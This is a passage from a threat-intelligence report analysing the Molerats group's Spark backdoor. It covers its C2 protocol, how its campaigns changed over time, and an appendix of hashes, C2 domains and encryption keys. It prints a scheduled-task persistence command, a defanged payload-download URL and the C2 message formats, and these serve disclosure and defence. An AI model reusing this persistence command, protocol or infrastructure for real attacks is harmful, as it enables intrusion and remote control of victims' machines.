following:\r\n{\"CallieVK\":\"eyJaZWtlIjpbeyJGcmVkZXJpY2tUIjoiNXlVdTE2QWU4V0t0aX\u003credacted\u003e0iLCJLYWlsZWVYd3MiOnRydWUsIlJlZXNlZlAiOjV9XX0\r\nThe payload will then encrypt this JSON object and send it to the C2 server to exfiltrate the results of the issued command.\r\nFigure 12 shows the HTTP POST request containing the encrypted JSON object that contains the “Winston” communication\r\ntype.\r\nFigure 12. Payload sending the results of the issued command to the C2 server\r\nAfter sending the results of the initial commands, the payload expects the C2 to reply with a JSON object with a “Garrison”\r\nfield set to a number, such as “{\"Garrison\" : 8}”. Figure 13 shows the C2 server responding with ciphertext of the JSON\r\nobject with the “Garrison” field.\r\nFigure 13. C2 server sending the Garrison JSON object to the payload\r\nThis concludes the check-in and initial command execution portion of the C2. The payload will enter a loop to continuously\r\nsend HTTP requests to obtain additional commands to run using the same sequence of JSON objects previously explained\r\nstarting after the “JoslynKe” communication type that sent the system information to the C2. Instead of sending the system\r\ninformation to the C2 and parsing the response for a command, each iteration of this loop will start with a communication\r\ntype of “VanessaFM” as seen here:\r\n{\"CallieVK\":\"eyJBZGVsaW5lUkQiOiJ2Y0picTZuemdKaz0iLCJBdmVyaXp0IjoiMSIsIkJyYW5kZW50bEsiOjEsIk1hdGhpYXNOYm8iOlt7IkFkYWx5b\r\nThe data in the “CallieVK” field decodes to a JSON object that has several fields, one of which is an array called\r\n“MathiasNbo” that contains JSON objects that transmit the UUID for the compromised system in a field named\r\n“CollinsPM” that was previously transmitted to the C2 in the “ZaydenlnL” field of the “JoslynKe” communication type. The\r\nJSON object also contains a field “AdelineRD” that contains a nickname or campaign identifier value in the form of base64\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 12 of 21\n\nencoded ciphertext. We have compiled a list of campaign codes of known Spark payloads, which we have included in the\r\nAppendix. The resulting JSON object will look like the following:\r\n{\"AdelineRD\":\"vcJbq6nzgJk=\",\"Averizt\":\"1\",\"BrandentlK\":1,\"MathiasNbo\":[{\"AdalynngS\":1,\"CollinsPM\":\"\"\u003cbase64\r\nencoded ciphertext of UUID seen in ZaydenlnL field\u003e\",\"Nevaeh\":true}]}\r\nThis JSON is encrypted and base64 encoded and sent to the C2 server, as seen in Figure 14. The payload will use the same\r\nJSON each iteration of the main loop and will expect the C2 to provide the same sequence of responses as discussed before\r\nthat contain “Jordanlzw”, “Allier”, and “Garrison” fields to receive additional commands.\r\nFigure 14. Payload issuing HTTP POST to C2 server requesting further commands\r\nComparison between 2019 and 2020 campaigns\r\nWhile collecting additional Spark samples, we found samples from a 2019 campaign and newer samples that were compiled\r\nin January 2020 used in the Spark Campaign. The delivery documents and Spark payloads used in these campaigns differ\r\nfrom the delivery document we observed in the October and November 2019 attacks. At a high level, the January 2019\r\ndelivery document was self-contained as it had its payload embedded within it, while the October 2019, November 2019 and\r\nJanuary 2020 delivery documents required interacting with a remote server. The October 2019 and January 2020 documents\r\ndiffer as the former attempts to download a VBScript that downloads a payload from the actor controlled server, whereas the\r\nJanuary 2020 document attempts to load a remote template from Google Drive whose macro attempts to download a\r\npayload from Google Drive. The known Spark payloads installed by each of these delivery documents differ as well, which\r\nwe will compare with the known payload from the November attack discussed earlier in this blog.\r\nWe analyzed a delivery document from the 2019 campaign and found that it was a macro-enabled Word document\r\n(SHA256:40b7a1e8c00deb6d26f28bbdd3e9abe0a483873a4a530742bb65faace89ffd11). The macro made the decoy contents\r\nby setting a textbox in the document to visible with the line “Shapes(\"textbox1\").Visible = True”, while the attacks discussed\r\nearlier in this blog did not attempt to display any updated decoy contents. Another marked difference is that while both the\r\nJanuary and October 2019 delivery documents wrote to a secondary VBScript %userprofile%\\wmsetup.vbs and\r\nprogramdata\\Micorsoft\\Microsoft.vbs respectively, the wmsetup.vbs script contains the binary payload while Microsoft.vbs\r\nattempts to download another VBScript that will download the binary payload. The wmsetup.vbs script decodes an\r\nembedded base64 encoded payload (SHA256:9511940ed52775aef969fba004678f4c142b33e2dd631a0e8f4e536ab0b811db\r\n), saves it to %temp%\\ihelp.exe and creates a scheduled task for persistence by running the following command:\r\nschtasks /create /f /sc minute /mo 1 /tn ihelp /tr %temp%\\ihelp.exe\r\nA few notable characteristics of the Spark payload delivered in January 2019 include the use of different freely-available\r\nlibraries from other known samples, such as using the msgpackv1 library instead of JSON to structure its configuration and\r\nC2 communications, as well as using the SFML library instead of cURL. Also, unlike the Spark payload delivered in\r\nNovember 2019, this payload uses the AES cipher to decrypt its configuration and other pertinent strings and to encrypt and\r\ndecrypt network communications with its C2. It uses the entire SHA256 hash of a supplied key string without using the\r\ncustom rolling XOR cipher on the key and ciphertext as discussed earlier in this blog. The decrypted configuration from this\r\npayload structured using msgpack appears as follows:\r\n\\x88\\xa4jevG\\xadsmartweb9[.]com\\xa3JRk\\xa1/\\xa3ufRP\\xa4qNxp\\x00\\xa4kfds\\xa0\\xa4WjaS\\x01\\xa3WnF\\xb8OMfX5GiCmOICUvhunB2lWQ==\\xa3s\r\nWe also analyzed a delivery document from the 2020 Spark campaign\r\n(SHA256:8c0966c9518a7ec5bd1ed969222b2bcf9420295450b7ed2f45972e766d26ded8) and it differed from both the\r\nJanuary and October 2019 delivery documents. First, the initial delivery document did not contain a macro, rather it attempts\r\nto load a remote template from Google Drive, specifically at the following URL:\r\nhxxps://drive.google.com/uc?export=download\u0026d=1NbCEnL-jA89PWBEhLWwHmBM5nmUKNRS8\r\nThe remote template (SHA256:a0ae5cc0659693e4c49d3597d5191923fcfb54040b9b5c8229e4c46b9330c367) contains a\r\nmacro that attempts to download an executable from the following URL:\r\nhxxs://drive.google.com/uc?export=download\u0026id=1yiDnuLRfQTBdak6S8gKnJLEzMk3yvepH\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 13 of 21\n\nThe executable hosted at the Google Drive link\r\n(SHA256:7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128) is a compiled AutoIt script that\r\nattempts to install a Spark backdoor to %userprofile%\\runawy.exe, which is the same exact dropper and payload as we\r\nobserved installed by the “attachment.doc” delivery document discussed earlier in this blog.\r\nTable 6 shows a comparison of features in the Spark payloads discussed in this section. Unfortunately, we were unable to\r\nobtain the payload installed by the MOFA-related Word documents delivered in the October 2019 attacks. If we compare the\r\nSpark samples installed by the delivery documents in January 2019 and 2020 with the Spark sample installed by the\r\nPictures.pdf delivery document in November 2019, we see notable differences that suggest this threat group is continually\r\ndeveloping this backdoor.\r\nFeature Jan. 2019 Spark\r\nNov. 2019 Spark\r\n(Pictures.pdf)\r\nOct. and Nov. 2019\r\n“attachment.doc” and Jan. 2020\r\n“The Spark Campaign”\r\nDropper None Compiled AutoIt script Compiled AutoIt script\r\nHTTP Library SFML cURL 7.56.0-DEV elnormous' HTTPRequest\r\nConfiguration\r\nStructure\r\nmsgpack version 1\r\nJSON for Modern C++\r\nv2.1.1\r\nJSON for Modern C++ v3.7.0\r\nPayload Packer Enigma Virtual Box Enigma (5.X) Enigma (5.X)\r\nCipher used AES on ciphertext\r\nRolling XOR on key and\r\nciphertext + 3DES on\r\nciphertext\r\nRolling XOR on key and\r\nciphertext + custom AES\r\ndecrypting 16-byte chunks of\r\nciphertext\r\nEncrypted data\r\nConfiguration, Names for\r\nC2 comms, Commands to\r\ngather system information\r\nConfiguration, Names for\r\nC2 comms, Commands to\r\ngather system information\r\nConfiguration, Names for C2\r\ncomms\r\nPersistence Scheduled task\r\nLNK Shortcut in\r\n@StartupDir\r\nScheduled task, Copied executable\r\nin @StartupDir\r\nTable 6. Comparison of Spark payloads delivered in January 2019, October 2019, November 2019 and January 2020\r\nConnection to Downeks\r\nKaspersky’s report mentioned the sub-groups of Molerats (AKA the Gaza Cybergang) are responsible for the Operation\r\nParliament campaign that delivered the Spark payload and we observed this threat group delivering the Downeks in the\r\nDustySky campaign. We observed some similarities between Spark and Downeks from a development and installation\r\nperspective.\r\nFor instance, we observed the same binder Trojan, which is a malicious application used to open a decoy document and to\r\ninstall a payload, one installing a Downeks payload and two others installing Spark. The binder Trojan installing Downeks\r\nwas compiled in December 2015 and was used during the DustySky campaign as mentioned in our blog (SHA256:\r\n75336b05443b94474434982fc53778d5e6e9e7fabaddae596af42a15fceb04e9), while we have two samples of this binder\r\nTrojan installing Spark samples that were compiled in November 2017\r\n(SHA256:4889318807225e51bae4d9d9a536e5775eaf92685b289eef6839f9d89f8c4b85) and April 2018\r\n(SHA256:23cf013ab91e6bd964c4d9a5d48c188a09838c32a75db68dd0690418f5ca7e7c).\r\nFrom a development perspective, both the Downeks and Spark payloads use libraries and code from several open-source\r\nprojects available on GitHub to carry out its C2 communications and to structure data in JSON. First, Spark uses the cURL\r\nlibrary for C2 communications, specifically version 7.56.0-DEV whose source code is available on GitHub, while Downeks\r\n(SHA256:9347a47d63b29c96a4f39b201537d844e249ac50ded388d66f47adc4e0880c7) used cURL to communicate with the\r\nC2 server, but an earlier version (7.39.0). Second, the payload uses JSON to parse its configuration and to structure its\r\nmessages sent to and from the C2 server, which it uses JSON for Modern C++ Version 2.1.1 also available on GitHub. The\r\npreviously mentioned Downeks also used JSON to parse its configuration and to structure the data it sends and receives\r\nfrom its C2 server. However, it used Tencent’s RapidJSON again freely available on GitHub. This fits our previous\r\nobservations of the developer of Spark using different JSON libraries within different versions of Spark.\r\nConclusion\r\nMolerats, also known as the Gaza Hacking Team and the Gaza Cybergang, has been targeting eight organizations in six\r\ndifferent countries in the government, telecommunications, insurance and retail industries between October 2019 through\r\nthe beginning of December 2019. This group uses spear-phishing emails to deliver both malicious Word and PDF\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 14 of 21\n\ndocuments, and attempts to social engineer the victim into an infection rather than trying to exploit a software vulnerability.\r\nAlso, the group uses the Spark backdoor in attacks, but continues to develop this tool using different freely available\r\nlibraries to structure important data and to carry out C2 communications.\r\nPalo Alto Networks customers are protected from the attacks discussed in this blog by:\r\nAll known Spark payloads and delivery documents have malicious verdicts in WildFire\r\nAll known Spark C2 domains and domains used in the delivery are marked with malicious classifications and\r\nverdicts in PANDB and DNS Security\r\nAutoFocus customers can track the delivery documents and payloads with the tags: Molerats_Spark\r\nAppendix\r\nIndicators of Compromise\r\nFiles related to MOFA documents\r\nd19104ef4f443e80c21375f1b779f00c960e0193e8aade69d7ad87a11f39c897 - MOFA- 031019.doc\r\ndc3311b3a827840c25689c0e153f2c09ba9583bcf18cdc43b88b12cf9846e94b - Microsoft.vbs\r\nc45b5b01e1c3284fd694db6aa0ebeab8abe78d9bb12eb41b957cd121d97b3516 - PlayerVLC.vbs\r\n03be1d7e1071b018d3fbc6496788fd7234b0bb6d3614bec5b482f3bf95aeb506 - MOFA- 061019.doc\r\n725d907b33cca8cec22f561068a3a8abf3616a8e2f452adb7fbd4aec20390f06 - Microsoft.vbs\r\nFiles related to Attachment.doc\r\neaf2ba0d78c0fda95f0cf53daac9a89d0434cf8df47fe831165b19b4e3568000 - attachment.doc\r\n7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128 - rundll64.exe\r\n64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431 - runawy.exe\r\nFiles related to Pictures.pdf\r\n9d6ce7c585609b8b23703617ef9d480c1cfe0f3bf6f57e178773823b8bf86495 - Pictures.pdf\r\n1742caf26d41641925d109caa5b4ebe30cda274077fbc68762109155d3e0b0da - Pictures.rar\r\n92d0c5f5ecffd3d3cfda6355817f4410b0daa3095f2445a8574e43d67cdca0b7 - الصور من قليلة عينة هذه.exe\r\n5139a334d5629c598325787fc43a2924d38d3c005bffd93afb7258a4a9a8d8b3 - pdf.exe\r\nRelated Spark payloads and Delivery documents\r\nee9f90819a578c8256fc950f62bd9f7b051edbee06618a26fa21c2875c3c301e - الج الحكومة قائمة 973 رقم المذكرة) Note No. 973\r\nGovernment List c)\r\n9451a110f75cbc3b66af5acb11a07a8d5e20e15e5487292722e695678272bca7 - GoogleChrome.vbs\r\nddf938508618ff7f147b3f7c2b706968cace33819e422fe1daae78bc256f75a8 - MOFA- 101019.doc\r\n4f51b180a6d0b074778d055580788dc33c9e1fd2e49f3c9a19793245a8671cba - Microsoft.vbs\r\nfeec28c7c19a8d0ebdca8fcfc0415ae79ef08362bd72304a99eeea55c8871e21 - - 9 -ليوم الفلسطينية المستجدات أهم حول اليومي التقرير\r\n9 - 2019.doc (Daily report on the most important Palestinian developments, 9-9-2019.doc)\r\nbf126c2c8f7d4263c78f4b97857912a3c1e87c73fee3f18095d58ef5053f2959 - 9 - 9 -العالمي اإلرهاب مستجدات أخر حول اليومي التقرير\r\n2019 -.doc (Daily updates on the latest terrorism report Alaalmi- 9 - 9 - 2019.doc)\r\n243f1301d1d759c17cd49336512ebceb9d347995c90a6e00aff926439d63f12d - Daily Report.rar\r\n602828399e24dca9259a4fc4c26f07408d1e0a638c015109c6c84986dc442ebb\r\neaf2ba0d78c0fda95f0cf53daac9a89d0434cf8df47fe831165b19b4e3568000\r\n273aa20c4857d98cfa51ae52a1c21bf871c0f9cd0bf55d5e58caba5d1829846f\r\n71ea0ba573451b14bb411ad28e5aac883f8af0376db8c9d34f309778c901c5d6\r\na0ae5cc0659693e4c49d3597d5191923fcfb54040b9b5c8229e4c46b9330c367\r\n8c0966c9518a7ec5bd1ed969222b2bcf9420295450b7ed2f45972e766d26ded8\r\n7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128\r\n64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431\r\ne8d73a94d8ff18c7791bf4547bc4ee2d3f62082c594d3c3cf7d640f7bbd15614\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 15 of 21\n\n6e60f5c65299ee7f7b257f5c83d3bb36154654b26e721136f7184514fcf6b296\r\nb08b8fddb9dd940a8ab91c9cb29db9bb611a5c533c9489fb99e36c43b4df1eca\r\na6e0297777ba29e21e5d1acca6210d436eee5c2b93d2dec27910ffd6e2266559\r\n6e896099a3ceb563f43f49a255672cfd14d88799f29617aa362ecd2128446a47\r\ncf32479ed30ae959c4ec8a286bb039425d174062b26054c80572b4625646c551\r\n92d0c5f5ecffd3d3cfda6355817f4410b0daa3095f2445a8574e43d67cdca0b7\r\n5139a334d5629c598325787fc43a2924d38d3c005bffd93afb7258a4a9a8d8b3\r\n89acce7cdd354a04f2edd4a2226caf5c47246a8196ec1d9b98159da38ec20c24\r\nb654dd768912e09b9c71eb388995b1d69b5baa45e970a6afc42733d647220712\r\ndaa72ba2b9525d74e0a3564d0d72e06eed27d04ce63fe98c45b1e84cee09987c\r\nc39e3adb6e15b9964bf0f9702b632086951b4ed9f9fb9cadd6975962a031a398\r\n255a29f88150285a9553f67a6475dc50fcbb5fc737a0178cc0e737d49c8d1b20\r\n4889318807225e51bae4d9d9a536e5775eaf92685b289eef6839f9d89f8c4b85\r\n23cf013ab91e6bd964c4d9a5d48c188a09838c32a75db68dd0690418f5ca7e7c\r\n75336b05443b94474434982fc53778d5e6e9e7fabaddae596af42a15fceb04e9\r\n9a3ec0a8b2a88106fc537d9cae1989f6fba36bb43352a944d2031e7b2ab7673c\r\n89d7337ac102cd80316ad59a1dcfcc5c7849d0e7520f0f85e1781574423e38ea\r\n19ede61c865a3cdd59d3a5d1a79b7ce83ca7828a6b80a2f968d82b5b56a8603c\r\nf9df76f634586c698b967209d83834b98ff3d245d47d6993bfb27a0aa819d9b9\r\n704b19e0460a0fa7d952ba6feb5eadb9054895d1d753df72faf6f470446a0519\r\n194c236a3eed81f3180bdcc5bcbd29b782b1a0ef7962ceb1c4cb892a427563ff\r\nfc420a49b1e9e2200238a4846110c2e4e63bfe6d7088645f49ebb65718a70b7f\r\nbc9353adc58b983b080b61950fc6689ee340797458fc4fd8a1d6f492976aa0e2\r\n8c6dc796b35ef405c42c78e1011cc4a6df09315264d638271cb0674d044886cf\r\n9d49020debdc6ab63de249fd9289d51415395fc8b1e8a15a82f200bf90e674ee\r\n5b6e43d434148bfcf52fd441f64836ae35f4f0ed9d75bf9707f521bcbb7c0380\r\n3a32c81ec609a5466f050c09156f25b5561c691763f865ee437e95a246dcbbe1\r\nc3e23a42dc49b039828da6cef4ebb7226c85163651a69085ee7e1899aa804fed\r\n26b032a9b6a22047eb48f1fb1553827a5b85aa7229422d650fa1f37c48b3aeb1\r\n8e5bf597948ea6ad39f0030053978d1a14e1c3dbb4abf044a223e14544c73b7f\r\n1513032544512718d068b2f6e8b5087cae9fc446e40cd56c03ab7bbbe047add5\r\nd04276760d722c241e831dacee7cf9d63cb123ce7188d604df1c56c1197d7160\r\n83750372d4e8c043d6f916ec398303dc929b59e05b7f5a9dc5485e4530047f4a\r\n23cf013ab91e6bd964c4d9a5d48c188a09838c32a75db68dd0690418f5ca7e7c\r\nbf4cdb277881754db2f44a014c08ce1857c9c0c47c6c1c8582782b5c887241e2\r\n58376e763ef0ca9dccad55e043794b5ec0b34c8c2a20604cff0b26f216e3c1e2\r\n399344aa609f17e558356709a398b4478e5c737c7cc843e3d111d33192c35e5a\r\n1c43f8f68f7b8e40828f9f74566860b25a5dfd9b7f8b7620d71644866e6cb19d\r\nab2335ba3abe97a02a3a2d1b063a08ae649406f88d4cf02d22d724e649b9e7be\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 16 of 21\n\na4c6aea61953d515d38d75ae7b3ef2a37bb26d1f838722f0a67624d6a728549e\r\n51c1e6ce3ff1f42734bfa19a7142b5154172232afc5528dad4c527df3a44c0c1\r\n329e9e98f08f3d6a017254dd033984cfd6421ccab5b323ebace5d68662a98a09\r\n0631ed0995e21ec8f02f6167824eca92e84abfd8cf4dbbd9c7c88f88d4f570cd\r\nd010ef2b6664779b3c8cfa0a5179b7331d88d34d04350ebeeecb3bae65654393\r\n4889318807225e51bae4d9d9a536e5775eaf92685b289eef6839f9d89f8c4b85\r\n51042cac30b4d6072f79b3f9b27d8ee7b65f438549c90f57dc5fecc17d35054a\r\nec0d30d2fdd301bf0cfe66028c9a37d5535a8161909d0d3573447d1843f61c97\r\ne6e5593cbac23ec5c51e5f63c4c6616a8eb71697a89f9d1d17cc7be91c36e3e9\r\n36166db096ddb50af4f5c4be48b4274c535f40c74ce3450d4ad3bdaa2c28beb3\r\n966ad6452793b1562f0081456a951d3310d4e7690fa74ef8ff4046778bd37168\r\nb2437a54195d51435ad07867a5cb069e831fdd8e48bb70daa3894fde40754bc8\r\nfe19ab4fd65531163d197d565201c2afea7d9f8e74e5f75c714eb5fe086a02fd\r\n212aa6e3f236550bb4b9328071ee4f0e8a74465c75dcf1e6cde8502afde91364\r\ne489e5297ed8cf594c2a5160eff79b12b9ee68e36e0d00ed31f44b75c4a38f61\r\n0eebc31bb64ba0aa0ea335a5f35392ff1d058e97bf5cb5b46d7a89b197dcba7a\r\nfe0f23d6675260dd40f277906aa3dd34cbef2243336334dda10ad4500f8e6883\r\n7c5a9ce04002be953c556b5b50c10f8d462abc92d1ffe28a325d7ea741701be1\r\n45a2c50edd710476e0de8ece6cc5931035ce8183ac4cf521d494d94744d44c2c\r\nb84f2497e4cfeac240b1815b22741609e5a31f0be11667a3c7256c16788728ec\r\n78696cf4370817cb0ffd6930a92553d3551fe77cdc6d45638ddd13f05b9218b8\r\n5109f2c8f014698f1d2f0d59a7c9cc1cd9400a6fe4dcde95cc475f453e74bc6e\r\nab4e43b4e526d44bf12ae5113184afdf5c15630808f674f5e1a472eb6811ce3f\r\ndaa72ba2b9525d74e0a3564d0d72e06eed27d04ce63fe98c45b1e84cee09987c\r\n64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431\r\n6e60f5c65299ee7f7b257f5c83d3bb36154654b26e721136f7184514fcf6b296\r\nB08b8fddb9dd940a8ab91c9cb29db9bb611a5c533c9489fb99e36c43b4df1eca\r\ncf32479ed30ae959c4ec8a286bb039425d174062b26054c80572b4625646c551\r\n9511940ed52775aef969fba004678f4c142b33e2dd631a0e8f4e536ab0b811db\r\ne3779f6252ca606ace9ae06623ba086d1a441582b625e433799260d71cdb1b4b\r\ne6e9f7b0449976537d9276192e5767c9909cd34df028a8bf1cac3dbe490f0e73\r\n69df8e4bdc3fd69deb6c866254f80f6288549222ed0d07ccd4c05597e75414df\r\n40b7a1e8c00deb6d26f28bbdd3e9abe0a483873a4a530742bb65faace89ffd11\r\nRelated Delivery Domains\r\nservicebios[.]com\r\ndapoerwedding[.]com\r\nzmartco[.]com\r\nSpark C2 Domains\r\nwebtutorialz[.]com\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 17 of 21\n\nnysura[.]com\r\nlaceibagrafica[.]com\r\nmotoqu[.]com\r\nsmartweb9[.]com\r\nlaptower[.]com\r\napp.msexchanges16[.]com\r\nmsexchange13[.]com\r\ncloudserviceapi[.]online\r\nupdates.masterservices[.]online\r\nclients.itresolver[.]online\r\nupdate.itresolver[.]online\r\n91.219.237[.]99\r\ngoldenlines[.]site\r\nUpdate.nextdata[.]site\r\nSpark First Names and More\r\nDecrypted String Usage Description\r\nLawrence\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name in dictionary (JaseN) used to store the value of a task number\r\nprovided in the Ivory field\r\nAllier\r\nC2 Channel\r\n(from C2)\r\nKey name used to store a number for an unknown purpose, but it is\r\nexpected as a response to the MorganE communication type.\r\nJaseN\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name for a list of dictionaries in the MorganE communication type,\r\nrepresents the received task numbers\r\nIvory\r\nC2 Channel\r\n(from C2)\r\nKey name in the Jordanlzw list used to store a number that we believe is\r\na task number\r\nJonas\r\nC2 Channel\r\n(from C2)\r\nKey name in the Jordanlzw list used to store a boolean for an unknown\r\nreason\r\nReginacy\r\nC2 Channel\r\n(from C2)\r\nKey name in the Jordanlzw list used to store a boolean to not create the\r\nprocess, rather just send 'ok' back to C2\r\nTrumanRd\r\nC2 Channel\r\n(from C2)\r\nKey name in the Jordanlzw list used to store the command line\r\narguments to run with an executable\r\nAlanih\r\nC2 Channel\r\n(from C2)\r\nKey name in the Jordanlzw list used to store the executable to to run\r\nAverizt\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name that stores a number in the VanessaFM communication type\r\nthat is hardcoded within the binary.\r\nMathiasNbo\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name for a list of dictionaries in the VanessaFM communication\r\ntype\r\nBrandentlK\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name that stores a number in the VanessaFM communication type\r\nthat is hardcoded into the configuration.\r\nAdalynngS\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name in dictionary (MathiasNbo) used to store a number with\r\nunknown purpose.\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 18 of 21\n\nAdelineRD\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name that stores a base64 encoded encrypted string obtained from\r\nthe payload configuration sent to the C2 in the VanessaFM\r\ncommunication type. Considered as a nickname or campaign/payload\r\nidentifier.\r\nCollinsPM\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name in dictionary (MathiasNbo) used to store the UUID also seen\r\nin the ZaydenlnL field\r\nNevaeh\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name in dictionary (MathiasNbo) used to store a boolean with\r\nunknown purpose.\r\nLondonzO\r\nC2 Channel\r\n(from C2)\r\nKey name in the Jordanlzw list used to store a boolean to create a\r\nspecified process and wait for return\r\nJoslynKe\r\nC2 Channel\r\n(from\r\npayload)\r\nValue in ReeceWNM field to represent the transmission of system\r\ninformation\r\nAngelxEv\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name used in a system information dictionaries (Maximiliano) to\r\nstore the information type value (1 = UUID, 2 = hostname, 3 =\r\nusername)\r\nZaydenlnL\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name used in a system information dictionaries (Maximiliano) to\r\nstore the data associated with the type specified in AngelxEv\r\nHoustonod\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name used in a system information dictionaries (Maximiliano) to\r\nstore the value \"1\" whose purpose is unknown\r\nMaximiliano\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name in JoslynKe communication type that stores a list of system\r\ninformation dictionaries\r\nGarrison\r\nC2 Channel\r\n(from C2)\r\nKey name for a number value used by the payload possibly as a sleep\r\ninterval before sending results of additional commands.\r\nZeke\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name for a list of dictionaries in the Winston communications type\r\nReesefP\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name within a dictionary within the Zeke array used to represent\r\nthe task number\r\nFrederickT\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name within a dictionary within the Zeke array storing the results\r\nof the executed command for the task\r\nKaileeXws\r\nC2 Channel\r\n(from\r\npayload)\r\nKey name within a dictionary within the Zeke array storing the boolean\r\nif the execution was successful\r\nEverlyY\r\nC2 Channel\r\n(from C2)\r\nKey name for a number value used by the payload to idle for a specified\r\nnumber of seconds\r\nCallieVK\r\nC2 Channel\r\n(from\r\npayload)\r\nField in JSON sent to C2, used to store the communicated data\r\nReeceWNM\r\nC2 Channel\r\n(from\r\npayload)\r\nField in JSON sent to C2, used to store the communication type\r\nMorganE\r\nC2 Channel\r\n(from\r\npayload)\r\nValue in ReeceWNM field to represent the task number its about to send\r\ndata regarding\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 19 of 21\n\nWinston\r\nC2 Channel\r\n(from\r\npayload)\r\nValue in ReeceWNM field to represent the transmission of command\r\nexecution results\r\nJessicay\r\nC2 Channel\r\n(from\r\npayload)\r\nValue in ReeceWNM field to represent the beacon\r\nVanessaFM\r\nC2 Channel\r\n(from\r\npayload)\r\nValue in ReeceWNM field to represent the request for additional tasks\r\nrEA8GPZf4oIdOsjMxgFD Key\r\nUsed to encrypt fields within JSON sent to C2, including system\r\ninformation gathered\r\nJordanlzw\r\nC2 Channel\r\n(from C2)\r\nKey name of a list of dictionaries that store commands to run\r\nAryana\r\nC2 Channel\r\n(from C2)\r\nKey name for a number value used to specify the number of commands\r\nto run that are stored in the Jordanlzw list\r\n24 Config Minimum sleep interval between messages sent to C2\r\n119 Config Minimum sleep interval between failed C2 beacons\r\nJvFLb8pHNywoGdhtjsc5 Key Used to encrypt C2 communications\r\nSpark Nicknames/Campaign Codes\r\nSHA256 Compile Time Nickname\r\n0631ed0995e21ec.. 2017-03-27 2:46:06 28-10\r\n966ad6452793b15.. 2017-05-24 6:15:04 Nick name\r\n212aa6e3f236550.. 2017-05-24 6:15:04 Nick name\r\nab4e43b4e526d44.. 2017-05-24 6:15:04 Nick name\r\n36166db096ddb50.. 2017-10-07 7:06:22 bbb\r\nd010ef2b6664779.. 2017-10-07 7:06:23 28-10\r\n194c236a3eed81f.. 2017-10-22 7:03:45 sss\r\nfc420a49b1e9e22.. 2017-10-22 7:03:45 sss\r\nbc9353adc58b983.. 2017-10-22 7:03:45 sss\r\n9d49020debdc6ab.. 2017-10-22 7:03:45 Nick name\r\n3a32c81ec609a54.. 2017-10-22 7:03:45 3007\r\nc3e23a42dc49b03.. 2017-10-22 7:03:45 50852\r\n8e5bf597948ea6a.. 2017-10-22 7:03:45 O\r\n151303254451271.. 2017-10-22 7:03:45 Nick name\r\n83750372d4e8c04.. 2017-10-22 7:03:45 0204\r\n58376e763ef0ca9.. 2017-10-22 7:03:45 R\r\n1c43f8f68f7b8e4.. 2017-10-22 7:03:45 ood\r\nab2335ba3abe97a.. 2017-10-22 7:03:45 Nick name\r\na4c6aea61953d51.. 2017-10-22 7:03:45 Nick name\r\n329e9e98f08f3d6.. 2017-10-22 7:03:45 FUD\r\n78696cf4370817c.. 2017-10-22 7:03:45 Ben\r\nec0d30d2fdd301b.. 2017-10-28 10:55:21 28-10\r\n9511940ed52775a.. 2017-12-02 11:16:24 \u003cblank\u003e\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 20 of 21\n\n5139a334d5629c5.. 2019-09-16 10:00:45 bnvcs\r\n89acce7cdd354a0.. 2019-09-16 10:00:45 Docx\r\nb654dd768912e09.. 2019-09-16 10:00:45 2909\r\ndaa72ba2b9525d7.. 2019-09-16 10:00:45 PalCamp\r\n69df8e4bdc3fd69.. 2019-09-16 10:00:45 NewsMac\r\ncf32479ed30ae95.. 2019-12-30 9:45:44 1401\r\n64ea1f1e0352f3d.. 2020-01-12 10:57:50 FS1-2020\r\n6e60f5c65299ee7.. 2020-01-12 10:57:50 1801\r\nb08b8fddb9dd940.. 2020-01-12 10:57:50 FS1-2020\r\n04fa6aaea5e3a26.. 2020-01-12 10:57:50 up\r\nSource: https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nhttps://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/\r\nPage 21 of 21\n\nSpark Nicknames/Campaign SHA256 Codes Compile Time Nickname\n0631ed0995e21ec.. 2017-03-27 2:46:06 28-10\n966ad6452793b15.. 2017-05-24 6:15:04 Nick name\n212aa6e3f236550.. 2017-05-24 6:15:04 Nick name\nab4e43b4e526d44.. 2017-05-24 6:15:04 Nick name\n36166db096ddb50.. 2017-10-07 7:06:22 bbb\nd010ef2b6664779.. 2017-10-07 7:06:23 28-10\n194c236a3eed81f.. 2017-10-22 7:03:45 sss\nfc420a49b1e9e22.. 2017-10-22 7:03:45 sss\nbc9353adc58b983.. 2017-10-22 7:03:45 sss\n9d49020debdc6ab.. 2017-10-22 7:03:45 Nick name\n3a32c81ec609a54.. 2017-10-22 7:03:45 3007\nc3e23a42dc49b03.. 